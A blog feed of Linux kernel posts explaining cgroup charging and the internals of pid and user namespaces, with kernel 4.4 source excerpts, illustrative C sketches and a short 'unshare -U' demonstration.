struct css_set *from_cset = task_css_set(task);
struct css_set *to_cset = cset->mg_dst_cset;
get_css_set(to_cset);
css_set_move_task(task, from_cset, to_cset, true);
put_css_set_locked(from_cset);
}
}
</code></pre></div></div>
<h3> How cgroups affect processes </h3>
<p>From the above we know the internal implementation of cgroups. Let’s see how they control processes.</p>
<p>The control is done by the subsystems. For example, when the kernel allocates memory on behalf of a process, it calls ‘mem_cgroup_try_charge’ so that the memory cgroup can make sure the process never exceeds its limits.</p>
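<p>The charging idea can be sketched with a toy page counter. This is a hedged illustration only (names suffixed ‘_sketch’ are mine): the real kernel page_counter walks the css hierarchy and may trigger reclaim or OOM, while this version only does the limit check.</p>

```c
#include <assert.h>

/* A counter with a limit either accepts or rejects a charge. */
struct page_counter_sketch {
    unsigned long count;   /* pages currently charged */
    unsigned long limit;   /* maximum allowed pages */
};

/* Returns 0 and records the charge if it fits, -1 if the charge
 * would push the counter over its limit. */
static int try_charge_sketch(struct page_counter_sketch *c,
                             unsigned long npages)
{
    if (c->count + npages > c->limit)
        return -1;
    c->count += npages;
    return 0;
}

/* Undo a previous charge, e.g. when pages are freed. */
static void uncharge_sketch(struct page_counter_sketch *c,
                            unsigned long npages)
{
    c->count -= npages;
}
```

<p>Every allocation on behalf of a task in the cgroup goes through the charge path, so the task can never hold more charged pages than the limit allows.</p>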
pid namespace internals2019-12-20T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2019/12/20/pid-namespace
<p>Namespaces are another method to abstract resources. A namespace makes it appear to the processes within it that they have their own isolated instance of the global resources. Compared to a virtual machine, a namespace is much more lightweight. In this post I will dig into the pid namespace from the kernel side. I use kernel 4.4 throughout.</p>
<h3> Basic structure </h3>
<p>There are six types of namespaces: uts, ipc, mount, pid, net and user. The pid namespace is one of those collected in the ‘nsproxy’ structure.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>struct nsproxy {
atomic_t count;
struct uts_namespace *uts_ns;
struct ipc_namespace *ipc_ns;
struct mnt_namespace *mnt_ns;
struct pid_namespace *pid_ns_for_children;
struct net *net_ns;
};
</code></pre></div></div>
<p>‘task_struct’ has a ‘nsproxy’ member pointing to a ‘struct nsproxy’ that represents the process’s resource view. ‘struct pid_namespace’ represents a pid namespace.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> struct pid_namespace {
struct kref kref;
struct pidmap pidmap[PIDMAP_ENTRIES];
struct rcu_head rcu;
int last_pid;
unsigned int nr_hashed;
struct task_struct *child_reaper;
struct kmem_cache *pid_cachep;
unsigned int level;
struct pid_namespace *parent;
#ifdef CONFIG_PROC_FS
struct vfsmount *proc_mnt;
struct dentry *proc_self;
struct dentry *proc_thread_self;
#endif
#ifdef CONFIG_BSD_PROCESS_ACCT
struct fs_pin *bacct;
#endif
struct user_namespace *user_ns;
struct work_struct proc_work;
kgid_t pid_gid;
int hide_pid;
int reboot; /* group exit code if this pidns was rebooted */
struct ns_common ns;
};
</code></pre></div></div>
<p>The ‘pidmap’ member is an array of ‘struct pidmap’, a bitmap used to manage pid values. Its definition is simple.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> struct pidmap {
atomic_t nr_free;
void *page;
};
</code></pre></div></div>
<p>‘last_pid’ records the last used pid value. ‘child_reaper’ is the init process of the pid namespace. ‘user_ns’ points to the user namespace that owns this pid namespace.</p>
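<p>The bitmap allocation behind ‘pidmap’ and ‘last_pid’ can be sketched as follows. This is a hedged toy model (sizes and names suffixed ‘_sketch’ are mine): a set bit means “pid in use”, and the search starts just after ‘last_pid’, as ‘alloc_pidmap’ does.</p>

```c
#include <assert.h>
#include <string.h>

#define PID_MAX_SKETCH 256   /* real kernels use pid_max, typically 32768 */

struct pidmap_sketch {
    unsigned char page[PID_MAX_SKETCH / 8];
    int nr_free;
    int last_pid;
};

/* Mimics create_pid_namespace's setup: pid 0 is reserved up front. */
static void pidmap_init_sketch(struct pidmap_sketch *m)
{
    memset(m, 0, sizeof(*m));
    m->page[0] |= 1;
    m->nr_free = PID_MAX_SKETCH - 1;
    m->last_pid = 0;
}

static int pid_bit_set(const struct pidmap_sketch *m, int nr)
{
    return m->page[nr / 8] & (1u << (nr % 8));
}

/* Find-first-zero starting after last_pid, wrapping around. */
static int alloc_pidmap_sketch(struct pidmap_sketch *m)
{
    if (m->nr_free == 0)
        return -1;
    for (int i = 1; i <= PID_MAX_SKETCH; i++) {
        int nr = (m->last_pid + i) % PID_MAX_SKETCH;
        if (!pid_bit_set(m, nr)) {
            m->page[nr / 8] |= 1u << (nr % 8);
            m->nr_free--;
            m->last_pid = nr;
            return nr;
        }
    }
    return -1;
}

static void free_pidmap_sketch(struct pidmap_sketch *m, int nr)
{
    m->page[nr / 8] &= ~(1u << (nr % 8));
    m->nr_free++;
}
```

<p>Note how a freed pid is not reused immediately: the search resumes after ‘last_pid’, which is why new pids keep growing until the value wraps around.</p>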
<p>pid namespace is created by function ‘create_pid_namespace’ in the call chain of clone->copy_namespaces->copy_pid_ns->create_pid_namespace.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static struct pid_namespace *create_pid_namespace(struct user_namespace *user_ns,
struct pid_namespace *parent_pid_ns)
{
struct pid_namespace *ns;
unsigned int level = parent_pid_ns->level + 1;
int i;
int err;
if (level > MAX_PID_NS_LEVEL) {
err = -EINVAL;
goto out;
}
err = -ENOMEM;
ns = kmem_cache_zalloc(pid_ns_cachep, GFP_KERNEL);
if (ns == NULL)
goto out;
ns->pidmap[0].page = kzalloc(PAGE_SIZE, GFP_KERNEL);
if (!ns->pidmap[0].page)
goto out_free;
ns->pid_cachep = create_pid_cachep(level + 1);
if (ns->pid_cachep == NULL)
goto out_free_map;
err = ns_alloc_inum(&ns->ns);
if (err)
goto out_free_map;
ns->ns.ops = &pidns_operations;
kref_init(&ns->kref);
ns->level = level;
ns->parent = get_pid_ns(parent_pid_ns);
ns->user_ns = get_user_ns(user_ns);
ns->nr_hashed = PIDNS_HASH_ADDING;
INIT_WORK(&ns->proc_work, proc_cleanup_work);
set_bit(0, ns->pidmap[0].page);
atomic_set(&ns->pidmap[0].nr_free, BITS_PER_PAGE - 1);
for (i = 1; i < PIDMAP_ENTRIES; i++)
atomic_set(&ns->pidmap[i].nr_free, BITS_PER_PAGE);
return ns;
}
</code></pre></div></div>
<p>This function is straightforward: ‘ns->pidmap[0].page’ is the bitmap used to allocate and free pid values.</p>
<p>‘create_pid_cachep’ creates the cache for ‘struct pid’, which is defined as follows:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> struct pid
{
atomic_t count;
unsigned int level;
/* lists of tasks that use this pid */
struct hlist_head tasks[PIDTYPE_MAX];
struct rcu_head rcu;
struct upid numbers[1];
};
struct upid {
/* Try to keep pid_chain in the same cacheline as nr for find_vpid */
int nr;
struct pid_namespace *ns;
struct hlist_node pid_chain;
};
</code></pre></div></div>
<p>Every process has a ‘struct pid’.</p>
<p>The figure near the end of this post shows the data structure relations. A process may be referenced through another process’s ‘pid’; the ‘tasks’ array in ‘struct pid’ exists for this. ‘struct upid’ stores the pid value in its ‘nr’ member, and its ‘pid_chain’ member links the ‘struct upid’ into the ‘pid_hash’ hash table.</p>
<p>A process has ‘level+1’ pid values: one in its own pid namespace, and one for each of its ancestor pid namespaces. So ‘create_pid_cachep’ creates a cache whose objects hold a ‘struct pid’ plus ‘nr_ids - 1’ extra ‘struct upid’ entries.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static struct kmem_cache *create_pid_cachep(int nr_ids)
{
struct pid_cache *pcache;
struct kmem_cache *cachep;
mutex_lock(&pid_caches_mutex);
list_for_each_entry(pcache, &pid_caches_lh, list)
if (pcache->nr_ids == nr_ids)
goto out;
pcache = kmalloc(sizeof(struct pid_cache), GFP_KERNEL);
if (pcache == NULL)
goto err_alloc;
snprintf(pcache->name, sizeof(pcache->name), "pid_%d", nr_ids);
cachep = kmem_cache_create(pcache->name,
sizeof(struct pid) + (nr_ids - 1) * sizeof(struct upid),
0, SLAB_HWCACHE_ALIGN, NULL);
if (cachep == NULL)
goto err_cachep;
pcache->nr_ids = nr_ids;
pcache->cachep = cachep;
list_add(&pcache->list, &pid_caches_lh);
out:
mutex_unlock(&pid_caches_mutex);
return pcache->cachep;
}
</code></pre></div></div>
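<p>The per-level bookkeeping can be sketched as follows. This is a hedged toy model (names suffixed ‘_sketch’ are mine, and the ‘next_nr’ counter stands in for alloc_pidmap): allocating a pid in a nested namespace fills one (nr, ns) pair per level while walking up the parent chain, just like the loop in ‘alloc_pid’ shown in the next section.</p>

```c
#include <assert.h>
#include <stddef.h>

#define MAX_LEVEL_SKETCH 4

struct pid_ns_sketch {
    int level;
    struct pid_ns_sketch *parent;
    int next_nr;                  /* toy replacement for the pidmap */
};

struct upid_sketch {
    int nr;
    struct pid_ns_sketch *ns;
};

struct pid_sketch {
    int level;
    struct upid_sketch numbers[MAX_LEVEL_SKETCH + 1];
};

/* Fill numbers[level..0] by walking from the task's own namespace
 * up to the root namespace, one pid value per level. */
static void alloc_pid_sketch(struct pid_sketch *pid,
                             struct pid_ns_sketch *ns)
{
    pid->level = ns->level;
    struct pid_ns_sketch *tmp = ns;
    for (int i = ns->level; i >= 0; i--) {
        pid->numbers[i].nr = tmp->next_nr++;
        pid->numbers[i].ns = tmp;
        tmp = tmp->parent;
    }
}
```

<p>So a task living in a level-1 namespace ends up with two (nr, ns) pairs: its pid as seen inside the namespace, and its pid as seen by the root namespace.</p>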
<h3> pid management </h3>
<p>‘struct pid’ is created by ‘alloc_pid’ called by ‘copy_process’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> struct pid *alloc_pid(struct pid_namespace *ns)
{
struct pid *pid;
enum pid_type type;
int i, nr;
struct pid_namespace *tmp;
struct upid *upid;
int retval = -ENOMEM;
pid = kmem_cache_alloc(ns->pid_cachep, GFP_KERNEL);
tmp = ns;
pid->level = ns->level;
for (i = ns->level; i >= 0; i--) {
nr = alloc_pidmap(tmp);
if (IS_ERR_VALUE(nr)) {
retval = nr;
goto out_free;
}
pid->numbers[i].nr = nr;
pid->numbers[i].ns = tmp;
tmp = tmp->parent;
}
if (unlikely(is_child_reaper(pid))) {
if (pid_ns_prepare_proc(ns)) {
disable_pid_allocation(ns);
goto out_free;
}
}
get_pid_ns(ns);
atomic_set(&pid->count, 1);
for (type = 0; type < PIDTYPE_MAX; ++type)
INIT_HLIST_HEAD(&pid->tasks[type]);
upid = pid->numbers + ns->level;
spin_lock_irq(&pidmap_lock);
if (!(ns->nr_hashed & PIDNS_HASH_ADDING))
goto out_unlock;
for ( ; upid >= pid->numbers; --upid) {
hlist_add_head_rcu(&upid->pid_chain,
&pid_hash[pid_hashfn(upid->nr, upid->ns)]);
upid->ns->nr_hashed++;
}
spin_unlock_irq(&pidmap_lock);
return pid;
}
</code></pre></div></div>
<p>Every process has ‘level+1’ pid values, one for every namespace that can see it. In the first for loop, ‘alloc_pidmap’ returns the pid value for this process in pid namespace ‘tmp’. In the last for loop, we use ‘upid->nr’ and ‘upid->ns’ as the key and insert each ‘struct upid’ into the corresponding ‘pid_hash’ bucket. The function also initializes the ‘pid->tasks’ list heads, which link the processes that use this ‘struct pid’. ‘struct pid_link’ is used to connect a ‘task_struct’ with a ‘pid’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> struct pid_link
{
struct hlist_node node;
struct pid *pid;
};
</code></pre></div></div>
<p>Here ‘node’ is the list entry linked into ‘pid->tasks’, and ‘pid’ points to the ‘struct pid’. In ‘copy_process’ we can see the following code:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> if (likely(p->pid)) {
ptrace_init_task(p, (clone_flags & CLONE_PTRACE) || trace);
init_task_pid(p, PIDTYPE_PID, pid);
if (thread_group_leader(p)) {
init_task_pid(p, PIDTYPE_PGID, task_pgrp(current));
init_task_pid(p, PIDTYPE_SID, task_session(current));
if (is_child_reaper(pid)) {
ns_of_pid(pid)->child_reaper = p;
p->signal->flags |= SIGNAL_UNKILLABLE;
}
p->signal->leader_pid = pid;
p->signal->tty = tty_kref_get(current->signal->tty);
list_add_tail(&p->sibling, &p->real_parent->children);
list_add_tail_rcu(&p->tasks, &init_task.tasks);
attach_pid(p, PIDTYPE_PGID);
attach_pid(p, PIDTYPE_SID);
__this_cpu_inc(process_counts);
} else {
current->signal->nr_threads++;
atomic_inc(&current->signal->live);
atomic_inc(&current->signal->sigcnt);
list_add_tail_rcu(&p->thread_group,
&p->group_leader->thread_group);
list_add_tail_rcu(&p->thread_node,
&p->signal->thread_head);
}
attach_pid(p, PIDTYPE_PID);
nr_threads++;
}
static inline void
init_task_pid(struct task_struct *task, enum pid_type type, struct pid *pid)
{
task->pids[type].pid = pid;
}
static inline struct pid *task_pgrp(struct task_struct *task)
{
return task->group_leader->pids[PIDTYPE_PGID].pid;
}
void attach_pid(struct task_struct *task, enum pid_type type)
{
struct pid_link *link = &task->pids[type];
hlist_add_head_rcu(&link->node, &link->pid->tasks[type]);
}
</code></pre></div></div>
<p>If the created task is a thread group leader, we use the ‘current’ task’s group leader to initialize ‘task->pids[PIDTYPE_PGID]’ and attach the new task to the group leader’s ‘pid->tasks’ lists.</p>
<p>The following picture shows the data structure relations.</p>
<p><img src="/assets/img/pidns/1.png" alt="" /></p>
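<p>To close the loop on the ‘pid_hash’ table discussed above, here is a hedged sketch of a find_pid_ns-style lookup keyed by (nr, ns). The structures and hash function are simplified stand-ins (suffixed ‘_sketch’), not the kernel’s:</p>

```c
#include <assert.h>
#include <stddef.h>

#define HASH_BUCKETS 16

struct pid_ns_sketch2 { int level; };

struct upid_sketch2 {
    int nr;
    struct pid_ns_sketch2 *ns;
    struct upid_sketch2 *next;    /* stands in for pid_chain */
};

static struct upid_sketch2 *pid_hash_sketch[HASH_BUCKETS];

/* Toy hash over the pid value and the namespace pointer. */
static unsigned pid_hashfn_sketch(int nr, struct pid_ns_sketch2 *ns)
{
    return ((unsigned)nr ^ (unsigned)(size_t)ns) % HASH_BUCKETS;
}

static void hash_add_sketch(struct upid_sketch2 *u)
{
    unsigned b = pid_hashfn_sketch(u->nr, u->ns);
    u->next = pid_hash_sketch[b];
    pid_hash_sketch[b] = u;
}

/* The same pid value can exist in several namespaces; the (nr, ns)
 * pair disambiguates them, which is why both are part of the key. */
static struct upid_sketch2 *find_upid_sketch(int nr,
                                             struct pid_ns_sketch2 *ns)
{
    unsigned b = pid_hashfn_sketch(nr, ns);
    for (struct upid_sketch2 *u = pid_hash_sketch[b]; u; u = u->next)
        if (u->nr == nr && u->ns == ns)
            return u;
    return NULL;
}
```

<p>This is why two containers can each have their own pid 1: the lookup always carries the namespace alongside the numeric pid.</p>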
user namespace internals2019-12-17T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2019/12/17/user-namespace
<p>Namespaces are another method to abstract resources. A namespace makes it appear to the processes within it that they have their own isolated instance of the global resources. Compared to a virtual machine, a namespace is much more lightweight. In this post I will dig into the user namespace from the kernel side. I use kernel 4.4 throughout.</p>
<h3> Basic structure </h3>
<p>There are six types of namespaces: uts, ipc, mount, pid, net and user. The former five are collected in the ‘nsproxy’ structure.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>struct nsproxy {
atomic_t count;
struct uts_namespace *uts_ns;
struct ipc_namespace *ipc_ns;
struct mnt_namespace *mnt_ns;
struct pid_namespace *pid_ns_for_children;
struct net *net_ns;
};
</code></pre></div></div>
<p>‘task_struct’ has a ‘nsproxy’ member pointing to a ‘struct nsproxy’ that represents the process’s resource view. However, ‘struct nsproxy’ has no user namespace member. The user namespace is special, as it is tied to the process’s credentials. A user namespace is represented by ‘struct user_namespace’. ‘struct task_struct’s cred contains the process’s credential information, and ‘struct cred’ has a ‘user_ns’ member pointing to the process’s user namespace. ‘struct user_namespace’ has the following definition:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> struct user_namespace {
struct uid_gid_map uid_map;
struct uid_gid_map gid_map;
struct uid_gid_map projid_map;
atomic_t count;
struct user_namespace *parent;
int level;
kuid_t owner;
kgid_t group;
struct ns_common ns;
unsigned long flags;
/* Register of per-UID persistent keyrings for this namespace */
#ifdef CONFIG_PERSISTENT_KEYRINGS
struct key *persistent_keyring_register;
struct rw_semaphore persistent_keyring_register_sem;
#endif
};
</code></pre></div></div>
<p>‘struct uid_gid_map’ defines the uid/gid mapping between this user namespace and its parent. ‘parent’ points to the parent user namespace. Just like other namespaces, user namespaces form a hierarchy, and ‘level’ records the depth in that hierarchy. ‘owner’ and ‘group’ are the effective uid/gid of the process that created the namespace. ‘ns’ is the common namespace structure.</p>
<p>‘struct uid_gid_map’ is defined as follows:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> struct uid_gid_map { /* 64 bytes -- 1 cache line */
u32 nr_extents;
struct uid_gid_extent {
u32 first;
u32 lower_first;
u32 count;
} extent[UID_GID_MAP_MAX_EXTENTS];
};
</code></pre></div></div>
<p>As we know, when we write to /proc/PID/uid_map, we define the uid mapping between the process’s user namespace and its parent user namespace. uid_map/gid_map has the following format:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> ID-inside-ns ID-outside-ns length
</code></pre></div></div>
<p>Here ‘ID-inside-ns’ is the ‘uid_gid_extent’s ‘first’ member, ‘ID-outside-ns’ is the ‘uid_gid_extent’s ‘lower_first’ member and ‘length’ is the ‘count’ member. The uid/gid_map file can have at most UID_GID_MAP_MAX_EXTENTS (5) lines. The ‘lower’ in ‘lower_first’ refers to the parent user namespace.</p>
<p>Following pic shows the data structure relation.</p>
<p><img src="/assets/img/userns/1.png" alt="" /></p>
<h3> System call behavior of user namespace </h3>
<h4> clone </h4>
<p>The most common way to create new namespaces is the clone system call. Most of the work is done in the ‘copy_process’ function. ‘copy_creds’ copies the parent’s cred and creates the user namespace; the other namespaces are created in the ‘copy_namespaces’ function.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> int copy_creds(struct task_struct *p, unsigned long clone_flags)
{
struct cred *new;
int ret;
...
new = prepare_creds();
if (!new)
return -ENOMEM;
if (clone_flags & CLONE_NEWUSER) {
ret = create_user_ns(new);
if (ret < 0)
goto error_put;
}
...
atomic_inc(&new->user->processes);
p->cred = p->real_cred = get_cred(new);
alter_cred_subscribers(new, 2);
validate_creds(new);
return 0;
}
</code></pre></div></div>
<p>If userspace specifies ‘CLONE_NEWUSER’, ‘copy_creds’ calls ‘create_user_ns’ to create a new user namespace.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> int create_user_ns(struct cred *new)
{
struct user_namespace *ns, *parent_ns = new->user_ns;
kuid_t owner = new->euid;
kgid_t group = new->egid;
int ret;
if (parent_ns->level > 32)
return -EUSERS;
/*
* Verify that we can not violate the policy of which files
* may be accessed that is specified by the root directory,
* by verifing that the root directory is at the root of the
* mount namespace which allows all files to be accessed.
*/
if (current_chrooted())
return -EPERM;
/* The creator needs a mapping in the parent user namespace
* or else we won't be able to reasonably tell userspace who
* created a user_namespace.
*/
if (!kuid_has_mapping(parent_ns, owner) ||
!kgid_has_mapping(parent_ns, group))
return -EPERM;
ns = kmem_cache_zalloc(user_ns_cachep, GFP_KERNEL);
if (!ns)
return -ENOMEM;
ret = ns_alloc_inum(&ns->ns);
if (ret) {
kmem_cache_free(user_ns_cachep, ns);
return ret;
}
ns->ns.ops = &userns_operations;
atomic_set(&ns->count, 1);
/* Leave the new->user_ns reference with the new user namespace. */
ns->parent = parent_ns;
ns->level = parent_ns->level + 1;
ns->owner = owner;
ns->group = group;
/* Inherit USERNS_SETGROUPS_ALLOWED from our parent */
mutex_lock(&userns_state_mutex);
ns->flags = parent_ns->flags;
mutex_unlock(&userns_state_mutex);
set_cred_user_ns(new, ns);
#ifdef CONFIG_PERSISTENT_KEYRINGS
init_rwsem(&ns->persistent_keyring_register_sem);
#endif
return 0;
}
</code></pre></div></div>
<p>First we need to do some checks. The namespace hierarchy can be at most 32 levels deep. A chrooted process can’t create a user namespace. The creator also needs to have a mapping in the parent user namespace so that we can track the namespace’s parental relation. ‘kuid_has_mapping’ has the following definition:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static inline bool kuid_has_mapping(struct user_namespace *ns, kuid_t uid)
{
return from_kuid(ns, uid) != (uid_t) -1;
}
uid_t from_kuid(struct user_namespace *targ, kuid_t kuid)
{
/* Map the uid from a global kernel uid */
return map_id_up(&targ->uid_map, __kuid_val(kuid));
}
static u32 map_id_up(struct uid_gid_map *map, u32 id)
{
unsigned idx, extents;
u32 first, last;
/* Find the matching extent */
extents = map->nr_extents;
smp_rmb();
for (idx = 0; idx < extents; idx++) {
first = map->extent[idx].lower_first;
last = first + map->extent[idx].count - 1;
if (id >= first && id <= last)
break;
}
/* Map the id or note failure */
if (idx < extents)
id = (id - first) + map->extent[idx].first;
else
id = (u32) -1;
return id;
}
</code></pre></div></div>
<p>The ‘creator’ (the parent process’s euid) must have a mapping in the parent namespace. If not, there would be no way to tell who created the child user namespace.</p>
<p>After all these checks, ‘create_user_ns’ allocates a ‘user_namespace’ struct and does some initialization. The newly created user_namespace’s parent is set to the creator’s user_namespace and its level is incremented by one. Finally, ‘set_cred_user_ns’ sets the ‘cred’s ‘user_ns’ member to the newly created ‘user_namespace’.</p>
<h4> unshare </h4>
<p>The unshare system call is straightforward: it just creates a new user_namespace for the calling process.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> int unshare_userns(unsigned long unshare_flags, struct cred **new_cred)
{
struct cred *cred;
int err = -ENOMEM;
if (!(unshare_flags & CLONE_NEWUSER))
return 0;
cred = prepare_creds();
if (cred) {
err = create_user_ns(cred);
if (err)
put_cred(cred);
else
*new_cred = cred;
}
return err;
}
</code></pre></div></div>
<h4> setns </h4>
<p>Another way to move a process into a user namespace is the setns system call. This system call needs an fd referring to a namespace, obtained from /proc/PID/ns/xxx.
‘create_new_namespaces’ does nothing for the user namespace; the call to ‘ns->ops->install’ does the work. First the ‘ns_common’ struct is obtained from the ‘struct file’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> SYSCALL_DEFINE2(setns, int, fd, int, nstype)
{
struct task_struct *tsk = current;
struct nsproxy *new_nsproxy;
struct file *file;
struct ns_common *ns;
int err;
file = proc_ns_fget(fd);
ns = get_proc_ns(file_inode(file));
if (nstype && (ns->ops->type != nstype))
goto out;
new_nsproxy = create_new_namespaces(0, tsk, current_user_ns(), tsk->fs);
err = ns->ops->install(new_nsproxy, ns);
switch_task_namespaces(tsk, new_nsproxy);
out:
fput(file);
return err;
}
</code></pre></div></div>
<p>For user namespace, the ‘ns->ops->install’ callback is ‘userns_install’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static int userns_install(struct nsproxy *nsproxy, struct ns_common *ns)
{
struct user_namespace *user_ns = to_user_ns(ns);
struct cred *cred;
/* Don't allow gaining capabilities by reentering
* the same user namespace.
*/
if (user_ns == current_user_ns())
return -EINVAL;
/* Tasks that share a thread group must share a user namespace */
if (!thread_group_empty(current))
return -EINVAL;
if (current->fs->users != 1)
return -EINVAL;
if (!ns_capable(user_ns, CAP_SYS_ADMIN))
return -EPERM;
cred = prepare_creds();
if (!cred)
return -ENOMEM;
put_user_ns(cred->user_ns);
set_cred_user_ns(cred, get_user_ns(user_ns));
return commit_creds(cred);
}
</code></pre></div></div>
<p>It first gets the ‘user_namespace’ from the ‘ns_common’ struct. After some checks, it calls ‘set_cred_user_ns’ to set the process’s cred’s ‘user_ns’ member to the namespace the fd refers to.</p>
<h4> getuid </h4>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> SYSCALL_DEFINE0(getuid)
{
/* Only we change this so SMP safe */
return from_kuid_munged(current_user_ns(), current_uid());
}
uid_t from_kuid_munged(struct user_namespace *targ, kuid_t kuid)
{
uid_t uid;
uid = from_kuid(targ, kuid);
if (uid == (uid_t) -1)
uid = overflowuid;
return uid;
}
</code></pre></div></div>
<p>‘current_uid’ returns the process’s kuid. ‘from_kuid’ returns the uid that ‘kuid’ maps to in user namespace ‘targ’. If there is no mapping, ‘overflowuid’ (DEFAULT_OVERFLOWUID, 65534) is returned. This is why we get the following result if we create a user namespace but do not set the /proc/PID/uid_map mapping file.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> test@ubuntu:~/nstest$ unshare -U
nobody@ubuntu:~/nstest$ id
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
</code></pre></div></div>
<h3> User namespace hierarchy </h3>
<p>From the last part, every user namespace has a parent except ‘init_user_ns’, which is hard-coded in the kernel as follows:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> struct user_namespace init_user_ns = {
.uid_map = {
.nr_extents = 1,
.extent[0] = {
.first = 0,
.lower_first = 0,
.count = 4294967295U,
},
},
.gid_map = {
.nr_extents = 1,
.extent[0] = {
.first = 0,
.lower_first = 0,
.count = 4294967295U,
},
},
.projid_map = {
.nr_extents = 1,
.extent[0] = {
.first = 0,
.lower_first = 0,
.count = 4294967295U,
},
},
.count = ATOMIC_INIT(3),
.owner = GLOBAL_ROOT_UID,
.group = GLOBAL_ROOT_GID,
.ns.inum = PROC_USER_INIT_INO,
#ifdef CONFIG_USER_NS
.ns.ops = &userns_operations,
#endif
.flags = USERNS_INIT_FLAGS,
#ifdef CONFIG_PERSISTENT_KEYRINGS
.persistent_keyring_register_sem =
__RWSEM_INITIALIZER(init_user_ns.persistent_keyring_register_sem),
#endif
};
</code></pre></div></div>
<p>As we can see, the uid/gid mapping of ‘init_user_ns’ is the identity mapping, so for processes that don’t use user namespaces it has no effect. Let’s take an example. Say we have a user whose uid is 1000, and its user namespace is ‘init_user_ns’.</p>
<p><img src="/assets/img/userns/2.png" alt="" /></p>
<p>Then the user creates two user namespaces named ‘us1’ and ‘us2’. ‘us1’ has a ‘0 1000 1’ uid_map and ‘us2’ has a ‘200 1000 1’ uid_map. When we write to the /proc/PID/uid_map file,
‘proc_uid_map_write’ is called and finally ‘map_write’. In this function we can see how the ‘uid_gid_map’ is constructed.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> extent->first = simple_strtoul(pos, &pos, 10);
if (!isspace(*pos))
goto out;
pos = skip_spaces(pos);
extent->lower_first = simple_strtoul(pos, &pos, 10);
if (!isspace(*pos))
goto out;
pos = skip_spaces(pos);
extent->count = simple_strtoul(pos, &pos, 10);
if (*pos && !isspace(*pos))
goto out;
</code></pre></div></div>
<p>When userspace reads /proc/PID/uid_map, the seq_file interface is used. When the file is opened, the kernel calls ‘proc_id_map_open’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static int proc_id_map_open(struct inode *inode, struct file *file,
const struct seq_operations *seq_ops)
{
struct user_namespace *ns = NULL;
struct task_struct *task;
struct seq_file *seq;
int ret = -EINVAL;
task = get_proc_task(inode);
if (task) {
rcu_read_lock();
ns = get_user_ns(task_cred_xxx(task, user_ns));
rcu_read_unlock();
put_task_struct(task);
}
if (!ns)
goto err;
ret = seq_open(file, seq_ops);
if (ret)
goto err_put_ns;
seq = file->private_data;
seq->private = ns;
return 0;
err_put_ns:
put_user_ns(ns);
err:
return ret;
}
</code></pre></div></div>
<p>Note that ‘seq->private’ stores the user namespace of the process that /proc/PID/uid_map belongs to, and that ‘seq_open’ sets ‘seq_file->file’ to the file’s ‘struct file’.</p>
<p>The following is the show function of /proc/PID/uid_map.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static int uid_m_show(struct seq_file *seq, void *v)
{
struct user_namespace *ns = seq->private;
struct uid_gid_extent *extent = v;
struct user_namespace *lower_ns;
uid_t lower;
lower_ns = seq_user_ns(seq);
if ((lower_ns == ns) && lower_ns->parent)
lower_ns = lower_ns->parent;
lower = from_kuid(lower_ns, KUIDT_INIT(extent->lower_first));
seq_printf(seq, "%10u %10u %10u\n",
extent->first,
lower,
extent->count);
return 0;
}
static inline struct user_namespace *seq_user_ns(struct seq_file *seq)
{
#ifdef CONFIG_USER_NS
return seq->file->f_cred->user_ns;
#else
extern struct user_namespace init_user_ns;
return &init_user_ns;
#endif
}
</code></pre></div></div>
<p>‘ns’ is the target process’s user namespace, and ‘lower_ns’ is the user namespace of the process that opened the file. So different opening processes may see different contents in /proc/PID/uid_map. We have discussed ‘from_kuid’ above: it returns the mapping of ‘kuid’ in the ‘targ’ user_namespace.</p>
<p>Back to our example: us1 has the ‘0 1000 1’ uid_map, us2 has the ‘200 1000 1’ uid_map.</p>
<p>When a process in us1 reads a us2 process’s /proc/PID/uid_map, the ‘lower_ns’ in ‘uid_m_show’ is us1 and the ‘extent’ comes from us2, so it shows
‘200 0 1’. Conversely, when a process in us2 reads a us1 process’s /proc/PID/uid_map, it shows ‘0 200 1’.</p>
<p>The following pictures show these cases.</p>
<p><img src="/assets/img/userns/3.png" alt="" /></p>
<p><img src="/assets/img/userns/4.png" alt="" /></p>
A brief overview of cloud-hypervisor, a modern VMM (2019-09-07) — http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2019/09/07/cloud-hypervisor
<h3> Background </h3>
